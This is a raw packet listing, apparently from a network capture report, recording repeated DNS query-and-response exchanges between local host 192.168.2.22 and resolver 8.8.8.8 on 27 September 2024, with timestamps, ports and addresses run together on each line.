                                                                                            Sep 27, 2024 14:02:18.778495073 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.778666973 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.799374104 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.799525976 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.813419104 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.813591957 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.831449032 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.831573963 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.854410887 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.871073008 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.878428936 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.879570961 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.889507055 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.889919996 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.920315981 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.920476913 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.937869072 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.938009977 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.945465088 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:20.965308905 CEST5897153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:20.974731922 CEST53589718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:20.987418890 CEST5897153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:20.994302034 CEST53589718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.449182034 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.462201118 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.463200092 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.478538990 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.479163885 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.489877939 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.490087032 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.498716116 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.499460936 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.506505966 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.521554947 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.529395103 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.529992104 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.537921906 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.539876938 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.547296047 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.551565886 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.558698893 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.560522079 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.567609072 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:25.586810112 CEST6016953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:25.594616890 CEST53601698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:25.594794989 CEST6016953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:25.603899956 CEST53601698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:25.604042053 CEST6016953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:25.611955881 CEST53601698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:25.612093925 CEST6016953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:25.619211912 CEST53601698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:25.619337082 CEST6016953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:25.629544020 CEST53601698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:26.643081903 CEST5306053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:26.650341988 CEST53530608.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:26.651241064 CEST5306053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:26.659401894 CEST53530608.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:26.663522959 CEST5306053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:26.670885086 CEST53530608.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:26.671418905 CEST5306053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:26.678873062 CEST53530608.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:26.679497004 CEST5306053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:26.686944008 CEST53530608.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:27.704106092 CEST4994953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:27.718914032 CEST53499498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:27.721134901 CEST4994953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:27.732901096 CEST53499498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:27.733119011 CEST4994953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:27.740436077 CEST53499498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:27.741099119 CEST4994953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:27.748317003 CEST53499498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:27.749089003 CEST4994953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:27.758771896 CEST53499498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:28.785058022 CEST5402753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:29.787377119 CEST5402753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:29.796268940 CEST53540278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:29.799376011 CEST5402753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:29.843225956 CEST53540278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:29.847320080 CEST5402753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:29.880785942 CEST53540278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:29.880956888 CEST5402753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:29.897290945 CEST53540278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:30.968007088 CEST6395053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:31.886224031 CEST53540278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:31.974327087 CEST6395053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:31.984044075 CEST53639508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:31.985910892 CEST6395053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:31.993442059 CEST53639508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:31.993592978 CEST6395053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:32.001693010 CEST53639508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:32.001812935 CEST6395053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:35.975151062 CEST53639508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:36.987131119 CEST5825753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:36.995634079 CEST53582578.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:36.995815992 CEST5825753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:37.002871037 CEST53582578.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:37.003053904 CEST5825753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:37.008770943 CEST53639508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:37.010605097 CEST53582578.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:37.010735989 CEST5825753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:37.017405987 CEST53582578.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:37.017582893 CEST5825753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:37.024231911 CEST53582578.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:38.029848099 CEST5473853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:38.036595106 CEST53547388.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:38.037190914 CEST5473853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:38.044112921 CEST53547388.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:38.045115948 CEST5473853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:38.052233934 CEST53547388.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:38.053117990 CEST5473853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:38.059756041 CEST53547388.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:38.061223030 CEST5473853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:38.067914009 CEST53547388.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:39.074343920 CEST4947853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:39.081543922 CEST53494788.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:39.081723928 CEST4947853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:39.088182926 CEST53494788.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:39.088316917 CEST4947853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:39.095236063 CEST53494788.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:39.095351934 CEST4947853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:39.101744890 CEST53494788.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:39.101870060 CEST4947853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:39.108789921 CEST53494788.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:40.124878883 CEST4928853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:40.131923914 CEST53492888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:40.132148981 CEST4928853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:40.139178038 CEST53492888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:40.139342070 CEST4928853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:41.243313074 CEST53492888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:41.249063015 CEST4928853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:41.256032944 CEST53492888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:41.256289959 CEST4928853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:41.263977051 CEST53492888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:42.281022072 CEST6159853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:42.288079977 CEST53615988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:42.288268089 CEST6159853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:42.295272112 CEST53615988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:42.295411110 CEST6159853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:42.301724911 CEST53615988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:42.301851034 CEST6159853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:42.309058905 CEST53615988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:42.309293032 CEST6159853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:42.316507101 CEST53615988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:43.361294031 CEST5875453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:43.368000031 CEST53587548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:43.369215012 CEST5875453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:43.474973917 CEST53587548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:43.475310087 CEST5875453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:43.482492924 CEST53587548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:43.482686043 CEST5875453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:43.489629030 CEST53587548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:43.489845991 CEST5875453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:43.496916056 CEST53587548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:44.511938095 CEST4922653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:44.518887997 CEST53492268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:44.519349098 CEST4922653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:44.525933027 CEST53492268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:44.527199030 CEST4922653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:44.534140110 CEST53492268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:44.535283089 CEST4922653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:44.541544914 CEST53492268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:44.543648958 CEST4922653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:44.550646067 CEST53492268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:45.563704014 CEST5469553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:45.571538925 CEST53546958.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:45.573168993 CEST5469553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:45.579875946 CEST53546958.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:45.585141897 CEST5469553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:45.592400074 CEST53546958.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:45.597150087 CEST5469553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:45.604234934 CEST53546958.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:45.609148979 CEST5469553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:45.616240978 CEST53546958.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:46.643217087 CEST6160153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:46.650427103 CEST53616018.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:46.650613070 CEST6160153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:46.658082962 CEST53616018.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:46.658345938 CEST6160153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:46.665216923 CEST53616018.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:46.665421009 CEST6160153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:46.672744989 CEST53616018.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:46.673024893 CEST6160153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:46.679428101 CEST53616018.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:47.690587044 CEST5461553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:47.697150946 CEST53546158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:47.698303938 CEST5461553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:47.705549955 CEST53546158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:47.706152916 CEST5461553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:47.713053942 CEST53546158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:47.715298891 CEST5461553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:47.722497940 CEST53546158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:47.722769022 CEST5461553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:47.730133057 CEST53546158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:48.752840996 CEST5495053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:48.861085892 CEST53549508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:48.863837004 CEST5495053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:48.873302937 CEST53549508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:48.875737906 CEST5495053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:48.884577036 CEST53549508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:48.885143042 CEST5495053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:48.893030882 CEST53549508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:48.897203922 CEST5495053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:48.904799938 CEST53549508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:49.916645050 CEST6421553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:49.923938036 CEST53642158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:49.925184011 CEST6421553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:49.933187008 CEST53642158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:49.937275887 CEST6421553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:49.943989992 CEST53642158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:49.949206114 CEST6421553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:49.956891060 CEST53642158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:49.961222887 CEST6421553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:49.968827963 CEST53642158.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:50.979044914 CEST5960453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:50.986630917 CEST53596048.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:50.986815929 CEST5960453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:50.993877888 CEST53596048.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:50.994090080 CEST5960453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:51.002264977 CEST53596048.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:51.002417088 CEST5960453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:51.010273933 CEST53596048.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:51.010415077 CEST5960453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:51.018040895 CEST53596048.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:52.397284985 CEST4952053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:52.403841019 CEST53495208.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:52.404021978 CEST4952053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:52.411003113 CEST53495208.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:52.411180973 CEST4952053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:52.417543888 CEST53495208.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:52.417761087 CEST4952053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:52.424103975 CEST53495208.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:52.424277067 CEST4952053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:52.430675983 CEST53495208.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:53.441936970 CEST5303153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:53.448434114 CEST53530318.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:53.449198008 CEST5303153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:53.456218004 CEST53530318.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:53.461230993 CEST5303153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:53.467708111 CEST53530318.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:53.469131947 CEST5303153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:53.475656986 CEST53530318.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:53.477123976 CEST5303153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:53.484428883 CEST53530318.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:54.525249004 CEST5311253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:54.531869888 CEST53531128.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:54.532608986 CEST5311253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:54.539583921 CEST53531128.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:54.539812088 CEST5311253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:54.546789885 CEST53531128.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:54.546993971 CEST5311253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:54.553998947 CEST53531128.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:54.554827929 CEST5311253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:54.561537027 CEST53531128.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:55.695678949 CEST6508053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:55.702800035 CEST53650808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:55.703037977 CEST6508053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:55.709841967 CEST53650808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:55.718578100 CEST6508053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:55.725799084 CEST53650808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:55.729657888 CEST6508053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:55.736851931 CEST53650808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:55.736984015 CEST6508053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:55.743971109 CEST53650808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:56.756722927 CEST5070253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:56.765150070 CEST53507028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:56.767497063 CEST5070253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:57.773524046 CEST5070253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:59.785926104 CEST5070253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:59.793366909 CEST53507028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:59.793551922 CEST5070253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:59.800708055 CEST53507028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:00.808397055 CEST5308953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:00.816037893 CEST53530898.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:00.816200972 CEST5308953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:00.832328081 CEST53530898.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:00.832458973 CEST5308953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:00.844110966 CEST53530898.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:00.844227076 CEST5308953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:00.853913069 CEST53530898.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:00.859249115 CEST5308953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:00.868678093 CEST53530898.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.780327082 CEST53507028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.903004885 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.910651922 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.910816908 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.917521954 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.917651892 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.924494028 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.924629927 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.931413889 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.931567907 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.938533068 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:02.780363083 CEST53507028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.083863974 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.091680050 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.092003107 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.098715067 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.101176023 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.109014988 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.115180016 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.123436928 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.129276037 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.135947943 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.158838034 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.165560961 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.165730000 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.173029900 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.173168898 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.180380106 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.180490017 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.187701941 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.187815905 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.194317102 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:05.208309889 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:06.213185072 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:06.220433950 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:06.220741034 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:06.227550983 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:06.227938890 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:10.215622902 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:10.217060089 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:10.223351955 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.234126091 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.251039982 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:11.258416891 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.258600950 CEST5943253192.168.2.228.8.8.8
